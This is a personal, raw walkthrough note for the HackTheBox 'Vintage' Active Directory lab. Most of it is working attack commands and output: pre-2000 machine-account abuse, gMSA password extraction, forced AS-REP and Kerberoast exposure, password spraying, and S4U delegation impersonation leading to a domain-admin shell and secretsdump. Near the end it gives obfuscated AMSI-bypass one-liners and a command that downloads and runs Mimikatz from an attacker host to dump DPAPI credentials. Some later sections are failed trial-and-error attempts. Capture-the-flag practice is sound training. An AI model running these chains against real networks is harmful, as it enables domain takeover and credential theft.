Here is my note for Vintage box from Hackthebox
VINTAGE: 10.129.165.43
As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123
P.Rosa:Rosaisbest123
Rosaisbest123:8C241D5FE65F801B408C96776B38FBA2
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
nxc ldap dc01.vintage.htb -k -u P.Rosa -p Rosaisbest123 --dns-tcp --dns-server 10.129.165.43 --bloodhound --collection All
bloodhound-python -k -c All -u P.Rosa -p 'Rosaisbest123' -d vintage.htb --dns-tcp -ns 10.129.165.43
bloodhound-python -k -c All -u 'FS01$' -p 'fs01' -d vintage.htb --dns-tcp -ns 10.129.165.43
BLOODHOUND DATA: FS01$
rbcd.py -delegate-from 'FS01$' -delegate-to 'DNSADMINS' -action 'write' 'vintage.htb/FS01$:fs01'
net rpc password "SVC_SQL" "newP@ssword2022" -U "vintage.htb"/"FS01$"%"fs01" -S "10.129.165.43"
bloodyAD --host "10.129.165.43" -d "vintage.htb" -u "FS01$" -p "fs01" set password "svc_sql" "newP@ssword2022" -k
FS01$ -> Members of -> Domain Computers@Vintage.HTB Group -> ReadGMSAPassword -> GMSA01$:
bloodyAD --host "dc01.vintage.htb" --dc-ip 10.129.165.43 -d "vintage.htb" -u "FS01$" -p "fs01" -k get object 'GMSA01$' --attr msDS-ManagedPassword
bloodyAD --host "dc01.vintage.htb" --dc-ip 10.129.165.43 -d "vintage.htb" -u "FS01$" -p "fs01" -k get object 'GMSA01$' --attr msDS-ManagedPassword
distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:7dc430b95e17ed6f817f69366f35be06
msDS-ManagedPassword.B64ENCODED: sfyyjet8CbAO5HFzqbtcCtYlqyYohprMvCgeztWhv4z/WOQOS1zcslIn9C3K/ucxzjDGRgHJS/1a54nxI0DxzlhZElfBxQL2z0KpRCrUNdKbdHXU/kzFj/i38J
FgOWrx2FMIGKrEEIohO3b2fA/U/vlPxw65M+kY2krLxl5tfD1Un1kMCByA1AI4VuR5zxXSfpnzFIxKlo1PKBJUxttMqbRM21I5/aLQnaIDCnr3WaqfU6lLwdGWxoz6XSD3UiqLaW5iDPYYR47kJpnflJgS0
TBUBkvd2JiLiOb5CXF1gBgUsbVLtBo/OWW/+lrvEpBtS7QIUFsOKMIaNsKFGtTkWQ==
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# crackmapexec ldap dc01.vintage.htb -k -u 'GMSA01$' -H '7dc430b95e17ed6f817f69366f35be06'
LDAP dc01.vintage.htb 389 dc01.vintage.htb [*] x64 (name:dc01.vintage.htb) (domain:vintage.htb) (signing:True) (SMBv1:False)
LDAP dc01.vintage.htb 389 dc01.vintage.htb [+] vintage.htb\GMSA01$:7dc430b95e17ed6f817f69366f35be06
GMSA01$ -> GenericWrite & Add Self -> ServiceManagers@VINTAGE.HTB group:
getTGT.py vintage.htb/'GMSA01$' -hashes aad3b435b51404eeaad3b435b51404ee:7dc430b95e17ed6f817f69366f35be06
export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/'GMSA01$.ccache'
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.165.43 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.165.43 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
[+] P.Rosa added to SERVICEMANAGERS
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.165.43 -k add groupMember "SERVICEMANAGERS" "GMSA01$"
[+] GMSA01$ added to SERVICEMANAGERS
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.101.218 -u 'GMSA01$' -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" 'GMSA01$'
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.101.218 -u 'GMSA01$' -k get object "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.101.218 -u 'GMSA01$' -k get object "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member
distinguishedName: CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB
member: CN=P.Rosa,CN=Users,DC=vintage,DC=htb; CN=C.Neri,CN=Users,DC=vintage,DC=htb; CN=G.Viola,CN=Users,DC=vintage,DC=htb; CN=L.Bianchi,CN=Users,DC=vintage,DC=htb; CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
#Then Update the GMSA01$ Ticket as usual:
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# getTGT.py vintage.htb/'GMSA01$' -hashes aad3b435b51404eeaad3b435b51404ee:7dc430b95e17ed6f817f69366f35be06
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in GMSA01$.ccache
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/'GMSA01$.ccache'
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# klist
Ticket cache: FILE:/home/kali/HTB/VINTAGE/10.129.165.43/GMSA01$.ccache
Default principal: GMSA01$@VINTAGE.HTB
Valid starting Expires Service principal
01/04/2025 11:50:39 01/04/2025 21:50:39 krbtgt/VINTAGE.HTB@VINTAGE.HTB
renew until 01/05/2025 11:50:39
ServiceManager@VINTAGE.HTB Group -> GenericAll -> svc_sql & svc_ark & svc_ldap users:
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.165.43 -k set password "svc_sql" "Password@9876" #NOPE.
Make sure to update the GMSA01 ticket after modify:
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# getTGT.py vintage.htb/'GMSA01$' -hashes aad3b435b51404eeaad3b435b51404ee:7dc430b95e17ed6f817f69366f35be06
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in GMSA01$.ccache
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/'GMSA01$.ccache'
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# klist
Ticket cache: FILE:/home/kali/HTB/VINTAGE/10.129.165.43/GMSA01$.ccache
Default principal: GMSA01$@VINTAGE.HTB
Valid starting Expires Service principal
01/04/2025 11:50:39 01/04/2025 21:50:39 krbtgt/VINTAGE.HTB@VINTAGE.HTB
renew until 01/05/2025 11:50:39
BloodyAD Way:
# Enable DONT_REQ_PREAUTH for ASREPRoast:
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k add uac svc_sql DONT_REQ_PREAUTH
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k add uac SVC_ARK -f DONT_REQ_PREAUTH
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH
# Disable ACCOUNTDISABLE:
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k remove uac SVC_SQL -f ACCOUNTDISABLE
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k remove uac SVC_ARK -f ACCOUNTDISABLE
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k remove uac SVC_LDAP -f ACCOUNTDISABLE
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k set object "SVC_SQL" servicePrincipalName -v "cifs/fake" #This will be useful for later.
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.166.76 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.166.76 -k remove uac SVC_SQL -f ACCOUNTDISABLE
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.166.76 -k set object "SVC_SQL" servicePrincipalName -v "cifs/fake"
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k set object "SVC_SQL" servicePrincipalName -v "cifs/fake"
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k remove uac SVC_SQL -f ACCOUNTDISABLE
getTGT.py vintage.htb/'GMSA01$' -hashes aad3b435b51404eeaad3b435b51404ee:7dc430b95e17ed6f817f69366f35be06
export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/'GMSA01$.ccache'
GetNPUsers.py -k -dc-ip 10.129.101.218 vintage.htb/ -usersfile users.txt -format hashcat
python3 targetedKerberoast.py -d vintage.htb --dc-host dc01.vintage.htb -k --no-pass -v
#Both ways required updated kerberos ticket after modified.
Got svc_ldap, svc_sql and svc_ark hashes !
svc_sql:Zer0the0ne
svc_sql cracked but not the other two.
c.neri_adm -> GenericWrite & AddSelf -> DELEGATEDADMINS@VINTAGE.HTB Group:
getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 -dc-ip 10.129.101.218
getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 -dc-ip 10.129.166.76
export KRB5CCNAME=/home/kali/HTB/VINTAGE/c.neri_adm.ccache
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k add groupMember "DELEGATEDADMINS" "P.Rosa"
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k add groupMember "DELEGATEDADMINS" "SVC_SQL"
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.166.76 -k add groupMember "DELEGATEDADMINS" "SVC_SQL"
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.166.76 -u 'c.neri_adm' -k get object "CN=DELEGATEDADMINS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member
getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 -dc-ip 10.129.166.76
export KRB5CCNAME=/home/kali/HTB/VINTAGE/c.neri_adm.ccache
getTGT.py vintage.htb/svc_sql:Zer0the0ne -dc-ip 10.129.231.205
getTGT.py vintage.htb/svc_sql:Zer0the0ne -dc-ip 10.129.231.205
getTGT.py vintage.htb/svc_sql:Zer0the0ne -dc-ip 10.129.231.205
getTGT.py vintage.htb/svc_sql:Zer0the0ne -dc-ip 10.129.166.76
export KRB5CCNAME=/home/kali/HTB/VINTAGE/svc_sql.ccache
impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.129.166.76 -k 'vintage.htb/svc_sql:Zer0the0ne'
impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.129.231.205 -k 'vintage.htb/svc_sql:Zer0the0ne'
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE]
└─# impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.129.231.205 -k 'vintage.htb/svc_sql:Zer0the0ne'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Impersonating L.BIANCHI_ADM
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache
export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache
impacket-secretsdump -k -no-pass dc01.vintage.htb
wmiexec.py -k -no-pass dc01.vintage.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
vintage\l.bianchi_adm
C:\>hostname
dc01
[SNIP]
C:\>whoami /groups
[SNIP]
Mandatory Label\High Mandatory Level Label S-1-16-12288
HIGH-PRIV ADMIN SHELL !
C:\Users\Administrator\Desktop>whoami
vintage\l.bianchi_adm
C:\Users\Administrator\Desktop>hostname
dc01
C:\Users\Administrator\Desktop>type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
#When it comes to kerberos ticket, any changes made on the server throughout this ticket required to update the ticket for further AD attacks.
#REST OF THEM BELOW ARE FULL OF TRIAL AND ERROR, likely don't work.
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.166.76 -u 'c.neri_adm' -k add dcsync administrator
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.166.76 -u 'c.neri_adm' get object 'DC=vintage,DC=htb' --attr ms-DS-MachineAccountQuota
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.166.76 -u 'c.neri_adm' add rbcd DC01$ c.neri_adm
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k set object "SVC_SQL" servicePrincipalName -v "cifs/fake"
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.231.205 -u 'c.neri_adm' -k get object "CN=DELEGATEDADMINS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k set object "P.Rosa" servicePrincipalName -v "cifs/fake"
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.101.218 -u 'c.neri_adm' -k get object "CN=DELEGATEDADMINS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member
getTGT.py vintage.htb/P.Rosa:Rosaisbest123 -dc-ip 10.129.101.218
export KRB5CCNAME=/home/kali/HTB/VINTAGE/P.Rosa.ccache
c.neri_adm -> MemberOf -> DELEGATEDADMINS@VINTAGE.HTB Group -> AllowedToAct -> DC01.VINTAGE.HTB:
getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 -dc-ip 10.129.101.218
export KRB5CCNAME=/home/kali/HTB/VINTAGE/c.neri_adm.ccache
klist
getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'
impacket-getST -spn cifs/dc01.vintage.htb -impersonate Administrator -dc-ip 10.129.101.218 -k 'vintage/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312'
impacket-getST -spn cifs/dc01.vintage.htb -impersonate L.BIANCHI_ADM -dc-ip 10.129.101.218 -k 'vintage/p.rosa:Rosaisbest123'
impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.129.231.205 -k 'vintage.htb/svc_sql:Zer0the0ne'
impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.129.166.76 -k 'vintage.htb/svc_sql:Zer0the0ne'
impacket-getST -spn ldap/dc01.vintage.htb -impersonate dc01 -dc-ip 10.129.166.76 -k 'vintage/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312'
impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.129.231.205 -k 'vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312'
impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne'
impacket-getST -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/dc01.vintage.htb" 'vintage.htb'/'c.neri_adm'
impacket-getST -k -no-pass -u2u -impersonate "L.BIANCHI_ADM" -spn "cifs/dc01.vintage.htb" 'vintage.htb'/'c.neri_adm'
export KRB5CCNAME=./Administrator.ccache
getTGT.py -hashes :$(pypykatz crypto nt 'Uncr4ck4bl3P4ssW0rd0312') 'vintage.htb'/'c.neri_adm'
describeTicket.py 'c.neri_adm.ccache' | grep 'Ticket Session Key'
python3 /usr/share/doc/python3-impacket/examples/describeTicket.py 'c.neri_adm.ccache' | grep 'Ticket Session Key'
[*] Ticket Session Key : 68c3776d29a520820e5da428321b194b
changepasswd.py -newhashes :68c3776d29a520820e5da428321b194b 'vintage.htb'/'c.neri_adm':'Uncr4ck4bl3P4ssW0rd0312'@'vintage.htb'
export KRB5CCNAME='adm_prju.ccache'
impacket-getST -u2u -impersonate ""_admin"" -spn ""cifs/mucdc.heron.vl"" -k -no-pass 'heron.vl'/'adm_prju'
export KRB5CCNAME='_admin@cifs_mucdc.heron.vl@HERON.VL.ccache'
crackmapexec smb 10.10.165.181 --use-kcache --ntds
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-03 15:15:59Z)
Wrong Account for some reason for P.Rosa.
NO ASREPROASTING.
getTGT.py -dc-ip 10.129.165.43 -hashes :8C241D5FE65F801B408C96776B38FBA2 vintage.htb/P.Rosa
getTGT.py vintage.htb/P.Rosa:Rosaisbest123 -dc-ip 10.129.165.43
export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/P.Rosa.ccache
GetUserSPNs.py vintage.htb/P.Rosa:Rosaisbest123 -dc-ip dc01.vintage.htb -request -k -debug
GetUserSPNs.py vintage.htb/P.Rosa:Rosaisbest123 -dc-ip dc01.vintage.htb -request -k -debug
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket
[+] Connecting to dc01.vintage.htb, port 389, SSL False
[+] Using Kerberos Cache: /home/kali/HTB/VINTAGE/10.129.165.43/P.Rosa.ccache
[+] SPN LDAP/DC01.VINTAGE.HTB@VINTAGE.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/VINTAGE.HTB@VINTAGE.HTB
[+] Using TGT from cache
[+] Trying to connect to KDC at dc01.vintage.htb
[+] Total of records returned 3
No entries found!
#NOPE, what a waste of time !
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# rpcclient 10.129.165.43 -U "P.Rosa" -c "enumdomusers;quit"
Password for [WORKGROUP\P.Rosa]:
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# rpcclient 10.129.165.43 -U "vintage.htb\P.Rosa" -c "enumdomusers;quit"
Password for [VINTAGE.HTB\P.Rosa]:
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# rpcclient 10.129.165.43 -U "vintage.htb\P.Rosa"
Password for [VINTAGE.HTB\P.Rosa]:
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
#NOPE.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
ldapsearch -H ldap://10.129.165.43 -x -W -D "p.rosa@vintage.htb" -b "dc=vintage,dc=htb" '(objectClass=person)' > ldap-people
#WORKS !
No Password Shown.
No Interesting Description.
ldapsearch -H ldap://10.129.165.43 -x -W -D "p.rosa@vintage.htb" -b "dc=vintage,dc=htb" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}' > users.txt
ldapsearch -LLL -H ldap://dc01.vintage.htb -x -W -D "p.rosa@vintage.htb" -Y GSSAPI -b "DC=vintage,DC=htb" -N -o ldif-wrap=no -E '!1.2.840.113556.1.4.801=::MAMCAQc=' "(&(objectClass=*))" | tee ldap.txt
poetry run pre2k auth -k -u p.rosa -p Rosaisbest123 -d vintage.htb -dc-ip 10.129.165.43
Pre-Computer Accounts:
Got Computer Accounts of AD Network ?
Consider check out Pre-Computer Accounts of it.
Either with authenticated or unauthenticated.
Either ways, consider use both of these two options.
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pre2k]
└─# cat computers.txt
DC01$
FS01$
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pre2k]
└─# poetry run pre2k unauth -d vintage.htb -dc-ip 10.129.165.43 -inputfile computers.txt
___ __
/'___`\ /\ \
_____ _ __ __ /\_\ /\ \\ \ \/'\
/\ '__`\/\`'__\/'__`\ _______\/_/// /__\ \ , <
\ \ \L\ \ \ \//\ __//\______\ // /_\ \\ \ \\`\
\ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
\ \ \/ \/_/ \/____/ \/_____/ \/_/\/_/
\ \_\ v3.1
\/_/
@garrfoster
@Tw1sm
[13:07:38] INFO Testing started at 2025-01-03 13:07:38
[13:07:38] INFO Using 10 threads
[13:07:39] INFO VALID CREDENTIALS: vintage.htb\FS01$:fs01
nxc ldap dc01.vintage.htb -u 'FS01$' -p fs01 -d vintage.htb -k
LDAP dc01.vintage.htb 389 dc01.vintage.htb [*] x64 (name:dc01.vintage.htb) (domain:vintage.htb) (signing:True) (SMBv1:False)
LDAP dc01.vintage.htb 389 dc01.vintage.htb [+] vintage.htb\FS01$:fs01
445/tcp open microsoft-ds?
STATUS NOT SUPPORT for P.Rosa for some reason.
crackmapexec smb 10.129.165.43 -k -d vintage.htb -u norm_users.txt -p norm_pass.txt --no-bruteforce --shares
SMB 10.129.165.43 445 10.129.165.43 [*] x64 (name:10.129.165.43) (domain:vintage.htb) (signing:True) (SMBv1:False)
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\M.Rossi: KDC_ERR_PREAUTH_FAILED
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\R.Verdi: KDC_ERR_PREAUTH_FAILED
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\L.Bianchi: KDC_ERR_PREAUTH_FAILED
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\G.Viola: KDC_ERR_PREAUTH_FAILED
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\C.Neri: KDC_ERR_PREAUTH_FAILED
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\P.Rosa: KDC_ERR_S_PRINCIPAL_UNKNOWN
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\C.Neri_adm: KDC_ERR_PREAUTH_FAILED
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\L.Bianchi_adm: KDC_ERR_PREAUTH_FAILED
This suggests that NTLM is disabled and authentication is only possible via kerberos. We can spray using crackmapexec and kerberos by adding the -k flag as follows:
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\P.Rosa: KDC_ERR_S_PRINCIPAL_UNKNOWN
IT'S VALID but we have to do it in kerberos way from now on.
smbclient.py -k vintage.htb/P.Rosa:Rosaisbest123@dc01.vintage.htb -dc-ip dc01.vintage.htb
#WORKS !
NO Interesting file in SYSVOL.
nxc smb dc01.vintage.htb -k -u P.Rosa -p Rosaisbest123
netexec smb dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -d vintage.htb -k --shares
crackmapexec smb dc01.vintage.htb -k -d vintage.htb -u norm_users.txt -p Zer0the0ne
crackmapexec smb dc01.vintage.htb -k -d vintage.htb -u norm_users.txt -p Zer0the0ne --continue-on-success
SMB dc01.vintage.htb 445 dc01.vintage.htb [*] x64 (name:dc01.vintage.htb) (domain:vintage.htb) (signing:True) (SMBv1:False)
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\M.Rossi: KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\R.Verdi: KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\L.Bianchi: KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\G.Viola: KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01.vintage.htb [+] vintage.htb\C.Neri:Zer0the0ne
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\P.Rosa: KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\C.Neri_adm: KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\L.Bianchi_adm: KDC_ERR_PREAUTH_FAILED
C.Neri:Zer0the0ne
According to LDAP, C.Neri is Remote Management Users.
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open wsman
getTGT.py vintage.htb/C.Neri:Zer0the0ne -dc-ip 10.129.101.218
export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/C.Neri.ccache
evil-winrm -i dc01.vintage.htb -r vintage.htb
evil-winrm -i dc01.vintage.htb -r vintage.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\C.Neri\Documents> whoami
vintage\c.neri
*Evil-WinRM* PS C:\Users\C.Neri\Documents> hostname
dc01
USER-SHELL !
*Evil-WinRM* PS C:\Users\C.Neri\Desktop> whoami
vintage\c.neri
*Evil-WinRM* PS C:\Users\C.Neri\Desktop> hostname
dc01
*Evil-WinRM* PS C:\Users\C.Neri\Desktop> dir
Directory: C:\Users\C.Neri\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/7/2024 1:17 PM 2312 Microsoft Edge.lnk
-ar--- 1/4/2025 6:15 PM 34 user.txt
*Evil-WinRM* PS C:\Users\C.Neri\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/8/2024 3:36 PM Administrator
d----- 6/7/2024 11:27 PM C.Neri
d----- 6/7/2024 4:06 PM c.neri_adm
d-r--- 5/24/2024 2:00 PM Public
We are going to perfom donpapi attack like the one we did in Rastalabs.
AMSI BYPASS ?
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
-WORKS !
iex(new-object net.webclient).downloadstring('http://10.10.14.111/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command '"sekurlsa::dpapi" "exit"'
-WORKS !
Get-ChildItem C:\Users\C.Neri\AppData\Local\Microsoft\Credentials\ -Force
*Evil-WinRM* PS C:\Users\C.Neri\Documents> Get-ChildItem C:\Users\C.Neri\AppData\Local\Microsoft\Credentials\ -Force
Directory: C:\Users\C.Neri\AppData\Local\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 6/7/2024 1:17 PM 11020 DFBE70A7E5CC19A398EBF1B96859CE5D
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\C.Neri\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D" "exit"'
mimikatz(powershell) # dpapi::cred /in:C:\Users\C.Neri\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
**BLOB**
dwVersion : 00000001 - 1
